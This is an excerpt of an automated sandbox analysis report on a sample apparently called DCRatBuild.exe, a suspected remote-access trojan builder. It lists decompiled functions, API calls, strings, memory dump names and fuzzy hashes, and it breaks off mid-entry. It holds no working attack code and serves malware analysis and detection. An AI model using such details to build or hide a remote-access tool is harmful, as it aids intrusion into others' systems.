                                                                                                                        Function 0049F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
                                                                                                                          • Part of subcall function 004A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0049F2E4
                                                                                                                        • GetProcAddress.KERNEL32(004D81C8,CryptUnprotectMemory), ref: 0049F2F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                        • API String ID: 2141747552-1753850145
                                                                                                                        • Opcode ID: e202a3d9f2bd55d7792b6f9e5cd06c0b5ea6b65be6b04c39309b865d2357e03a
                                                                                                                        • Instruction ID: be7885397e1cf92f13613131a12afa4209fb5df84f642c9dc3804e74445d0136
                                                                                                                        • Opcode Fuzzy Hash: e202a3d9f2bd55d7792b6f9e5cd06c0b5ea6b65be6b04c39309b865d2357e03a
                                                                                                                        • Instruction Fuzzy Hash: ABE0DF358007019ECB609F369808F427ED46F05709B24C83FE0CAD3240C6BED0408B08
                                                                                                                        Function 004B2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2252061734-0
                                                                                                                        • Opcode ID: 04104c6ddfb285d6fef5acada20e2462f035d7b302eea4576f1d3583819604be
                                                                                                                        • Instruction ID: 82e22aacd447f28cf2ebf9bb115e7997b9397254ae130bbfc2a12d09937d962c
                                                                                                                        • Opcode Fuzzy Hash: 04104c6ddfb285d6fef5acada20e2462f035d7b302eea4576f1d3583819604be
                                                                                                                        • Instruction Fuzzy Hash: 0151ED72600202AFDB288F15DA45BEB77B8FF14301F24452FE805572A1D7B9ED51D7A8
                                                                                                                        Function 004BBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 004BBF39
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BBF5C
                                                                                                                          • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BBF82
                                                                                                                        • _free.LIBCMT ref: 004BBF95
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004BBFA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 336800556-0
                                                                                                                        • Opcode ID: 87de9a94ff49de40b83ab2eb3fd57f1e04f1d12750fa4e5865b34fc9e80f3232
                                                                                                                        • Instruction ID: 60afc8fc8c2419fe8934bde4045b522fdd31dc5b64057166e127cb1267a7ac1e
                                                                                                                        • Opcode Fuzzy Hash: 87de9a94ff49de40b83ab2eb3fd57f1e04f1d12750fa4e5865b34fc9e80f3232
                                                                                                                        • Instruction Fuzzy Hash: 6201D4766016117F23212AB75C4DCFB7A6DDED2BA9314412EF904D2201EFA8CD02C5F8
                                                                                                                        Function 004B9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,004B91AD,004BB188,?,004B9813,00000001,00000364,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B986E
                                                                                                                        • _free.LIBCMT ref: 004B98A3
                                                                                                                        • _free.LIBCMT ref: 004B98CA
                                                                                                                        • SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B98D7
                                                                                                                        • SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B98E0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3170660625-0
                                                                                                                        • Opcode ID: f4245c25682fe25251dd4a5cdf495ebaa09cc0d123cb9552e3997752f94607a3
                                                                                                                        • Instruction ID: b2e06812c2e88252378a8add1399e77838594ee26c11fde50bad69e9f4ca1e53
                                                                                                                        • Opcode Fuzzy Hash: f4245c25682fe25251dd4a5cdf495ebaa09cc0d123cb9552e3997752f94607a3
                                                                                                                        • Instruction Fuzzy Hash: 3E01D1361646016BC212372A6C85EEB262DDFD27A9735013FF60592292EF6CCC02517D
                                                                                                                        Function 004A0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A11CF: ResetEvent.KERNEL32(?), ref: 004A11E1
                                                                                                                          • Part of subcall function 004A11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004A11F5
                                                                                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 004A0F21
                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 004A0F3B
                                                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 004A0F54
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004A0F60
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004A0F6C
                                                                                                                          • Part of subcall function 004A0FE4: WaitForSingleObject.KERNEL32(?,000000FF,004A1206,?), ref: 004A0FEA
                                                                                                                          • Part of subcall function 004A0FE4: GetLastError.KERNEL32(?), ref: 004A0FF6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1868215902-0
                                                                                                                        • Opcode ID: 755d1eded2466e7766e0539673ba6ec08bf720540a2323611d544b2d67232394
                                                                                                                        • Instruction ID: 86d67580fb9a336d15a9a7b22bf08e7a936fd1d1447705ed5c28eec8b9c47e78
                                                                                                                        • Opcode Fuzzy Hash: 755d1eded2466e7766e0539673ba6ec08bf720540a2323611d544b2d67232394
                                                                                                                        • Instruction Fuzzy Hash: 9C019276100740EFC7629F65DD84FC6BBA9FB08711F00492EF16A52160C7B57A44CA58
                                                                                                                        Function 004BC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 004BC817
                                                                                                                          • Part of subcall function 004B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?), ref: 004B8DE2
                                                                                                                          • Part of subcall function 004B8DCC: GetLastError.KERNEL32(?,?,004BC896,?,00000000,?,00000000,?,004BC8BD,?,00000007,?,?,004BCCBA,?,?), ref: 004B8DF4
                                                                                                                        • _free.LIBCMT ref: 004BC829
                                                                                                                        • _free.LIBCMT ref: 004BC83B
                                                                                                                        • _free.LIBCMT ref: 004BC84D
                                                                                                                        • _free.LIBCMT ref: 004BC85F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: eb1004e264f4a26d70dcd1c81b626961376cdaa112797d554a5d69abd411fb53
                                                                                                                        • Instruction ID: 6467b849da109917e49bc9bb81f6897ee28ef713b943d4618c7bdde2739b73cb
                                                                                                                        • Opcode Fuzzy Hash: eb1004e264f4a26d70dcd1c81b626961376cdaa112797d554a5d69abd411fb53
                                                                                                                        • Instruction Fuzzy Hash: 71F01232504200AB8660EB6AE4C6C9777EDAA147557941C3FF108D7652CB78FC80CA7C
                                                                                                                        Function 004A1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 004A1FE5
                                                                                                                        • _wcslen.LIBCMT ref: 004A1FF6
                                                                                                                        • _wcslen.LIBCMT ref: 004A2006
                                                                                                                        • _wcslen.LIBCMT ref: 004A2014
                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0049B371,?,?,00000000,?,?,?), ref: 004A202F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CompareString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3397213944-0
                                                                                                                        • Opcode ID: 765a394f8768295fb61660cc371a0459a7c489121ca09a1a01491e16de732b11
                                                                                                                        • Instruction ID: eaa190a277a679368b39a4cc6b3938365d75a6230da03563a5bd455c62a21d23
                                                                                                                        • Opcode Fuzzy Hash: 765a394f8768295fb61660cc371a0459a7c489121ca09a1a01491e16de732b11
                                                                                                                        • Instruction Fuzzy Hash: 22F06D32008014BBDF222F56EC09DCA3F26EB51765B11801BF61A5A061CB72DA61E6A8
                                                                                                                        Function 004A15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _swprintf
                                                                                                                        • String ID: %ls$%s: %s
                                                                                                                        • API String ID: 589789837-2259941744
                                                                                                                        • Opcode ID: 42e15353cd029c9fb68c57c388909cf73732c3c4f0912e8d8da83e67dc00c47d
                                                                                                                        • Instruction ID: ad1ed7a30e64751652bf7cfac19e4daae31b2df44d60906ae4f2aad3d5ec839c
                                                                                                                        • Opcode Fuzzy Hash: 42e15353cd029c9fb68c57c388909cf73732c3c4f0912e8d8da83e67dc00c47d
                                                                                                                        • Instruction Fuzzy Hash: 4E512079288300F7FA1126918D46F367665AB37B04F24451FF397A40F1C5AF9411A71F
                                                                                                                        Function 004B7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 004B7FAE
                                                                                                                        • _free.LIBCMT ref: 004B8079
                                                                                                                        • _free.LIBCMT ref: 004B8083
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                                                                                        • API String ID: 2506810119-119056061
                                                                                                                        • Opcode ID: 0ca8cd840eab999637055c5e324a059e5c61c7080d22e3458725841c6f8a6d16
                                                                                                                        • Instruction ID: 4bb2c703a124a2295ac81f20471d4553ddb772722b59bba6c0249e4ed7e31642
                                                                                                                        • Opcode Fuzzy Hash: 0ca8cd840eab999637055c5e324a059e5c61c7080d22e3458725841c6f8a6d16
                                                                                                                        • Instruction Fuzzy Hash: D631C070A00209AFDB21EF99C8809EEBBBCEB95344F11406FF50497211DAB88E45CB79
                                                                                                                        Function 004B31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004B31FB
                                                                                                                        • _abort.LIBCMT ref: 004B3306
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EncodePointer_abort
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 948111806-2084237596
                                                                                                                        • Opcode ID: ce7957331e47348f08cb72976ef7c56a93930cab722c40bdbab1d034830ca015
                                                                                                                        • Instruction ID: cb1354a536eecc9a140d255066d7f88efbdb15f83e7003efde45369fe03fc9a7
                                                                                                                        • Opcode Fuzzy Hash: ce7957331e47348f08cb72976ef7c56a93930cab722c40bdbab1d034830ca015
                                                                                                                        • Instruction Fuzzy Hash: 14416D71900209AFCF19DF99CD81AEEBBB5FF48305F18819AF90467211D739EA50DB68
                                                                                                                        Function 00497401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00497406
                                                                                                                          • Part of subcall function 00493BBA: __EH_prolog.LIBCMT ref: 00493BBF
                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004974CD
                                                                                                                          • Part of subcall function 00497A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00497AAB
                                                                                                                          • Part of subcall function 00497A9C: GetLastError.KERNEL32 ref: 00497AF1
                                                                                                                          • Part of subcall function 00497A9C: CloseHandle.KERNEL32(?), ref: 00497B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                        • API String ID: 3813983858-639343689
                                                                                                                        • Opcode ID: 734ec478ed08d10decf15a585c5c10da23116cfb2fa517aba8b1094e0868981b
                                                                                                                        • Instruction ID: b0b326167f7c9ffc1fb26a651b6877bb144a5c0c8980e1a8a8bce2dc78d3e58c
                                                                                                                        • Opcode Fuzzy Hash: 734ec478ed08d10decf15a585c5c10da23116cfb2fa517aba8b1094e0868981b
                                                                                                                        • Instruction Fuzzy Hash: 5B3192B1D04248BADF51EFA59C45BEE7FA8AB15318F04403BF805A7292C77C9A44C769
                                                                                                                        Function 004AAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004AAD98
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004AADAD
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 004AADC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: ASKNEXTVOL
                                                                                                                        • API String ID: 445417207-3402441367
                                                                                                                        • Opcode ID: 965429562f5f76020083624a805db6e85f3a9efc6fd8d94d06dfc8da7e1ee989
                                                                                                                        • Instruction ID: 41ae52ae7254e2575fb3cdf57443252a74708a510d38fe47b13a991cddaf1375
                                                                                                                        • Opcode Fuzzy Hash: 965429562f5f76020083624a805db6e85f3a9efc6fd8d94d06dfc8da7e1ee989
                                                                                                                        • Instruction Fuzzy Hash: C111B432240200AFD751CF69DC45F7B3B6AAB6B742F400026F280E65B0C7699925D72E
                                                                                                                        Function 004ADDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010422,004AB270,?,?), ref: 004ADE18
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogParam
                                                                                                                        • String ID: GETPASSWORD1$rJ$xzN
                                                                                                                        • API String ID: 665744214-922452723
                                                                                                                        • Opcode ID: ffde4a1b02e40316f2f37744df0fa46a953c348356f2bf25e864737e5a48bc87
                                                                                                                        • Instruction ID: f4479df4ef2d5c2102154c2780ff4ae9a18914bf0c378c6f41657781fc75f1a2
                                                                                                                        • Opcode Fuzzy Hash: ffde4a1b02e40316f2f37744df0fa46a953c348356f2bf25e864737e5a48bc87
                                                                                                                        • Instruction Fuzzy Hash: D9112932640144AADF129E34AC45FEB3794AB1A315F14407BBD46AB180CBBCAC84C36C
                                                                                                                        Function 0049D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __fprintf_l.LIBCMT ref: 0049D954
                                                                                                                        • _strncpy.LIBCMT ref: 0049D99A
